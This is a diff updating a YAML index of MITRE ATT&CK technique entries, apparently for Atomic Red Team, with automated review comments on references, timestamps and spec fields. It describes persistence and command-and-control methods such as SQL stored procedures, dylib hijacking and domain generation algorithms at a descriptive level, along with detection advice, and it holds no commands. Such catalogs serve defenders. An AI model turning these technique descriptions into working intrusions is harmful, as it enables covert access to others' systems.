- description: Microsoft. (2017, June 19). Common Language Runtime Integration.
- Retrieved July 8, 2019.
- - source_name: NetSPI SQL Server CLR
- url: https://blog.netspi.com/attacking-sql-server-clr-assemblies/
- description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
- Retrieved July 8, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2024-10-15T16:05:24.007Z'
name: SQL Stored Procedures
description: "Adversaries may abuse SQL stored procedures to establish persistent
access to systems. SQL Stored Procedures are code that can be saved and reused
@@ -36510,20 +36905,57 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Carlos Borges, @huntingneo, CIP
+ - Lucas da Silva Pereira, @vulcanunsec, CIP
+ - Kaspersky
+ x_mitre_deprecated: false
x_mitre_detection: 'On a MSSQL Server, consider monitoring for xp_cmdshell usage.(Citation:
NetSPI Startup Stored Procedures) Consider enabling audit features that can
log malicious startup activities.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a
+ created: '2019-12-12T14:59:58.168Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/001
+ external_id: T1505.001
+ - source_name: Microsoft CLR Integration 2017
+ description: Microsoft. (2017, June 19). Common Language Runtime Integration.
+ Retrieved July 8, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/clr-integration/common-language-runtime-integration-overview?view=sql-server-2017
+ - source_name: Microsoft xp_cmdshell 2017
+ description: Microsoft. (2017, March 15). xp_cmdshell (Transact-SQL). Retrieved
+ September 9, 2019.
+ url: https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-2017
+ - source_name: Kaspersky MSSQL Aug 2019
+ description: 'Plakhov, A., Sitchikhin, D. (2019, August 22). Agent 1433: remote
+ attack on Microsoft SQL Server. Retrieved September 4, 2019.'
+ url: https://securelist.com/malicious-tasks-in-ms-sql-server/92167/
+ - source_name: NetSPI Startup Stored Procedures
+ description: 'Sutherland, S. (2016, March 7). Maintaining Persistence via
+ SQL Server – Part 1: Startup Stored Procedures. Retrieved September 12,
+ 2024.'
+ url: https://www.netspi.com/blog/technical-blog/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/
+ - source_name: NetSPI SQL Server CLR
+ description: Sutherland, S. (2017, July 13). Attacking SQL Server CLR Assemblies.
+ Retrieved September 12, 2024.
+ url: https://www.netspi.com/blog/technical-blog/adversary-simulation/attacking-sql-server-clr-assemblies/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.004:
technique:
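Review bot: T1505.001 loses `x_mitre_permissions_required` (`Administrator`, `SYSTEM`, `root`) with no replacement field, so tooling that filters techniques by required privilege loses that signal for this entry; fine if the field is gone upstream, but worth stating. The two NetSPI references are moved to the new `netspi.com/blog/technical-blog/...` paths with updated retrieved dates, which is the right fix for the dead `blog.netspi.com` links.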
@@ -36553,7 +36985,7 @@ persistence:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#13
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Cisco
IOS Run-Time Memory Integrity Verification. Retrieved October 19, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2021-12-14T23:14:26.107Z'
name: Network Device Authentication
description: |-
Adversaries may use [Patch System Image](https://attack.mitre.org/techniques/T1601/001) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.
@@ -36577,12 +37009,10 @@ persistence:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1574.004:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-03-30T21:01:39.601Z'
name: Dylib Hijacking
description: |-
Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with @rpath
, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable. Additionally, if weak linking is used, such as the LC_LOAD_WEAK_DYLIB
function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
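Review bot: T1556.004 has both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` removed with nothing added back, whereas T1078.003 further down is bumped to `3.2.0`; T1574.012 in the `command-and-control` hunk has the same gap. If `x_mitre_attack_spec_version` is meant to be present on every entry, add it for those two rather than leaving them as the only entries without it.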
@@ -36666,11 +37096,10 @@ persistence:
url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1078.003:
technique:
- modified: '2023-07-14T13:04:04.591Z'
+ modified: '2024-10-15T16:36:36.681Z'
name: 'Valid Accounts: Local Accounts'
description: "Adversaries may obtain and abuse credentials of a local account
as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -36722,9 +37151,8 @@ persistence:
external_id: T1078.003
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1078.003
atomic_tests: []
T1574.012:
@@ -36773,7 +37201,7 @@ persistence:
url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
Profilers. Retrieved June 24, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-30T21:35:12.049Z'
name: 'Hijack Execution Flow: COR_PROFILER'
description: |-
Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -36811,14 +37239,12 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1574.012
atomic_tests: []
command-and-control:
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -36881,7 +37307,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1132.001:
technique:
@@ -36939,97 +37364,95 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1132.001
atomic_tests: []
T1568.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T15:55:16.111Z'
+ name: Domain Generation Algorithms
+ description: |-
+ Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
+
+ DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
+
+ Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
x_mitre_contributors:
- Ryan Benson, Exabeam
- Barry Shteiman, Exabeam
- Sylvain Gil, Exabeam
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
+
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
type: attack-pattern
+ id: attack-pattern--118f61a5-eb3e-4fb6-931f-2096647f4ecd
created: '2020-03-10T17:44:59.787Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1568.002
url: https://attack.mitre.org/techniques/T1568/002
- - source_name: Cybereason Dissecting DGAs
- url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
- description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
- Eight Real World DGA Variants. Retrieved February 18, 2019.'
- - source_name: Cisco Umbrella DGA
- url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
- description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
- Why so effective?. Retrieved February 18, 2019.
- - source_name: Unit 42 DGA Feb 2019
- url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
- description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
- Generation Algorithms (DGA). Retrieved February 19, 2019.'
- - url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ external_id: T1568.002
+ - source_name: Elastic Predicting DGA
+ description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
+ 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
+ Networks. Retrieved April 26, 2019.
+ url: https://arxiv.org/pdf/1611.00791.pdf
+ - source_name: Talos CCleanup 2017
description: 'Brumaghin, E. et al. (2017, September 18). CCleanup: A Vast
Number of Machines at Risk. Retrieved March 9, 2018.'
- source_name: Talos CCleanup 2017
- - source_name: Akamai DGA Mitigation
- url: https://blogs.akamai.com/2018/01/a-death-match-of-domain-generation-algorithms.html
- description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
- Domain Generation Algorithms. Retrieved February 18, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
+ url: http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
+ - source_name: Pace University Detecting DGA May 2017
+ description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
+ Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
+ April 26, 2019.
+ url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
+ - source_name: FireEye POSHSPY April 2017
description: Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless
WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
- source_name: FireEye POSHSPY April 2017
+ url: https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
- source_name: ESET Sednit 2017 Activity
- url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
description: 'ESET. (2017, December 21). Sednit update: How Fancy Bear Spent
the Year. Retrieved February 18, 2019.'
+ url: https://www.welivesecurity.com/2017/12/21/sednit-update-fancy-bear-spent-year/
- source_name: Data Driven Security DGA
- url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- - source_name: Pace University Detecting DGA May 2017
- url: http://csis.pace.edu/~ctappert/srd2017/2017PDF/d4.pdf
- description: Chen, L., Wang, T.. (2017, May 5). Detecting Algorithmically
- Generated Domains Using Data Visualization and N-Grams Methods . Retrieved
- April 26, 2019.
- - source_name: Elastic Predicting DGA
- url: https://arxiv.org/pdf/1611.00791.pdf
- description: Ahuja, A., Anderson, H., Grant, D., Woodbridge, J.. (2016, November
- 2). Predicting Domain Generation Algorithms with Long Short-Term Memory
- Networks. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
- name: Domain Generation Algorithms
- description: |-
- Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Unit 42 DGA Feb 2019)
-
- DGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.(Citation: Cybereason Dissecting DGAs)(Citation: Cisco Umbrella DGA)(Citation: Talos CCleanup 2017)(Citation: Akamai DGA Mitigation)
-
- Adversaries may use DGAs for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- x_mitre_detection: |-
- Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
-
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
+ - source_name: Akamai DGA Mitigation
+ description: Liu, H. and Yuzifovich, Y. (2018, January 9). A Death Match of
+ Domain Generation Algorithms. Retrieved February 18, 2019.
+ url: https://medium.com/@yvyuz/a-death-match-of-domain-generation-algorithms-a5b5dbdc1c6e
+ - source_name: Cisco Umbrella DGA
+ description: Scarfo, A. (2016, October 10). Domain Generation Algorithms –
+ Why so effective?. Retrieved February 18, 2019.
+ url: https://umbrella.cisco.com/blog/2016/10/10/domain-generation-algorithms-effective/
+ - source_name: Cybereason Dissecting DGAs
+ description: 'Sternfeld, U. (2016). Dissecting Domain Generation Algorithms:
+ Eight Real World DGA Variants. Retrieved February 18, 2019.'
+ url: http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-Dissecting-DGAs-Eight-Real-World-DGA-Variants.pdf
+ - source_name: Unit 42 DGA Feb 2019
+ description: 'Unit 42. (2019, February 7). Threat Brief: Understanding Domain
+ Generation Algorithms (DGA). Retrieved February 19, 2019.'
+ url: https://unit42.paloaltonetworks.com/threat-brief-understanding-domain-generation-algorithms-dga/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Network Traffic: Network Traffic Flow'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071.004:
technique:
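Review bot: the `Akamai DGA Mitigation` reference keeps its description (`Liu, H. and Yuzifovich, Y.`) but its URL now points at a `medium.com/@yvyuz` post instead of `blogs.akamai.com`; if the Akamai post is gone, a web.archive.org capture of the original, as used for the subt0x10 reference in this file, preserves the cited source better than a personal mirror, or else rename the `source_name` to match. This block also drops `x_mitre_permissions_required: User` with no replacement, same caveat as T1505.001 above.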
@@ -37095,9 +37518,67 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071.004
atomic_tests: []
+ T1071.005:
+ technique:
+ modified: '2024-10-16T13:08:35.629Z'
+ name: Publish/Subscribe Protocols
+ description: "Adversaries may communicate using publish/subscribe (pub/sub)
+ application layer protocols to avoid detection/network filtering by blending
+ in with existing traffic. Commands to the remote system, and often the results
+ of those commands, will be embedded within the protocol traffic between the
+ client and server. \n\nProtocols such as MQTT
, XMPP
,
+ AMQP
, and STOMP
use a publish/subscribe design,
+ with message distribution managed by a centralized broker.(Citation: wailing
+ crab sub/pub)(Citation: Mandiant APT1 Appendix) Publishers categorize their
+ messages by topics, while subscribers receive messages according to their
+ subscribed topics.(Citation: wailing crab sub/pub) An adversary may abuse
+ publish/subscribe protocols to communicate with systems under their control
+ from behind a message broker while also mimicking normal, expected traffic."
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ x_mitre_contributors:
+ - Domenico Mazzaferro Palmeri
+ - Sofia Sanchez Margolles
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ - Linux
+ - Windows
+ - Network
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'Network Traffic: Network Traffic Content'
+ type: attack-pattern
+ id: attack-pattern--241f9ea8-f6ae-4f38-92f5-cef5b7e539dd
+ created: '2024-08-28T14:14:18.512Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1071/005
+ external_id: T1071.005
+ - source_name: wailing crab sub/pub
+ description: Hammond, Charlotte. Villadsen, Ole. Metrick, Kat.. (2023, November
+ 21). Stealthy WailingCrab Malware misuses MQTT Messaging Protocol. Retrieved
+ August 28, 2024.
+ url: https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/
+ - source_name: Mandiant APT1 Appendix
+ description: Mandiant. (n.d.). Appendix C (Digital) - The Malware Arsenal.
+ Retrieved July 18, 2016.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mandiant-apt1-report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1573.001:
technique:
modified: '2023-12-26T20:58:19.356Z'
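Review bot: in the new T1071.005 block the description text for the protocol names (`MQTT`, `XMPP`, `AMQP`, `STOMP`) is split across lines that carry no `+` prefix, between `client and server. \n\nProtocols such as MQTT` and `use a publish/subscribe design,`. If that is the real patch content rather than a rendering artefact, `git apply` will reject the hunk and the quoted YAML string is broken; the likely cause is markup around the protocol names in the upstream description that the generator did not strip, so check the generated file directly. Separately, the new sub-technique ships with `x_mitre_detection: ''` and without an `identifier: T1071.005` key, while the neighbouring T1071.004 and T1071 entries do carry `identifier:`; confirm that omission is what the generator intends for a technique with no atomics folder.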
@@ -37143,7 +37624,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1568.001:
technique:
@@ -37175,7 +37655,7 @@ command-and-control:
url: https://www.welivesecurity.com/2017/01/12/fast-flux-networks-work/
description: 'Albors, Josep. (2017, January 12). Fast Flux networks: What
are they and how do they work?. Retrieved March 11, 2020.'
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T16:10:37.183Z'
name: Fast Flux DNS
description: |-
Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.(Citation: MehtaFastFluxPt1)(Citation: MehtaFastFluxPt2)(Citation: Fast Flux - Welivesecurity)
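Review bot: `modified` moves backwards here (`2021-04-29` to `2020-03-27`), and the same regression appears for T1205, T1572, T1090, T1568, T1568.003, T1104, T1205.001, T1102.003 and T1102.002 further down. Rewinding a timestamp is only correct if the upstream ATT&CK bundle being imported actually carries the older value for these untouched objects; if not, the sync is mixing bundle versions. Either way, any consumer that detects changes by comparing `modified` will not see these objects as updated, so name the upstream bundle version in the commit message.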
@@ -37197,22 +37677,20 @@ command-and-control:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Connection Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1071:
technique:
- modified: '2024-01-17T22:52:23.454Z'
+ modified: '2024-08-28T14:10:33.145Z'
name: Application Layer Protocol
description: "Adversaries may communicate using OSI application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
be embedded within the protocol traffic between the client and server. \n\nAdversaries
may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye
- Spy Email Nov 22) "
+ transferring files, electronic mail, DNS, or publishing/subscribing. For connections
+ that occur internally within an enclave (such as those between a proxy or
+ pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation:
+ Mandiant APT29 Eye Spy Email Nov 22) "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
@@ -37234,7 +37712,7 @@ command-and-control:
- macOS
- Windows
- Network
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
@@ -37259,7 +37737,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1071
atomic_tests: []
T1219:
@@ -37343,7 +37820,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1219
atomic_tests: []
T1659:
@@ -37407,11 +37883,10 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -37495,7 +37970,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1572:
technique:
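Review bot: this object is left at `x_mitre_attack_spec_version: 2.1.0` while `spec_version` is removed and every other object touched by the patch reports 3.2.0. That can be legitimate for an object upstream has not re-emitted since, but it is worth checking that the generator is reading one bundle rather than merging old and new exports.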
@@ -37526,7 +38000,7 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-27T17:15:35.372Z'
name: Protocol Tunneling
description: "Adversaries may tunnel network communications to and from a victim
system within a separate protocol to avoid detection/network filtering and/or
@@ -37546,8 +38020,8 @@ command-and-control:
encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
- [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
- further conceal C2 communications and infrastructure. "
+ [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+ to further conceal C2 communications and infrastructure. "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
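Review bot: the link text change to `[Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)` matches the rename of T1001.003 at the bottom of this patch; grep the rest of the index and the Indexes-Markdown/Indexes-CSV files for remaining `Protocol Impersonation` strings so the two names do not coexist after merge.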
@@ -37569,8 +38043,6 @@ command-and-control:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Connection Creation'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1572
atomic_tests: []
T1071.003:
@@ -37632,7 +38104,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1092:
technique:
@@ -37680,7 +38151,6 @@ command-and-control:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1090.002:
technique:
@@ -37734,7 +38204,6 @@ command-and-control:
